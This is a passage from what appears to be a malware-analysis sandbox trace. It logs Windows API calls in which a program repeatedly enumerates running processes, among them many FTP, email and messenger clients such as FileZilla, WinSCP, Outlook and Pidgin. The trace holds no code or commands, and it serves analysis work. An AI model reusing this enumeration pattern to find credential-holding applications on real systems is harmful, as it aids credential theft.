th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0182.626] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0182.629] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0182.631] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0182.633] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0182.636] CloseHandle (hObject=0x1974) returned 1 [0182.636] Sleep (dwMilliseconds=0x64) [0182.776] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1230 [0182.792] Process32First (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.794] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.797] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.799] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.803] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.805] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.807] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.810] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.813] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.861] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.864] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.866] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.871] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.873] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.875] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.877] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.879] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.882] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.885] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.887] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.889] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0182.891] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.894] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0182.896] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.902] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0182.905] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0182.907] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0182.909] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0182.911] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0182.914] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0182.916] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.920] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.921] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0182.936] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.940] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.942] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0182.945] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0182.948] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0182.951] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0182.957] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0182.959] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0182.961] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0182.962] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0182.964] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0182.966] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0182.968] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0182.970] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0182.973] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0182.975] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0182.978] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0182.980] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0182.982] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0182.984] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0182.987] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0182.989] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0182.991] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0182.993] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0182.998] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0183.000] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0183.006] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0183.008] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0183.011] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0183.013] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0183.016] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0183.019] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0183.021] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0183.024] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0183.027] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0183.029] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0183.032] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0183.034] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0183.042] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0183.046] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0183.048] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0183.050] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0183.052] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0183.055] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0183.057] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0183.059] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0183.062] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 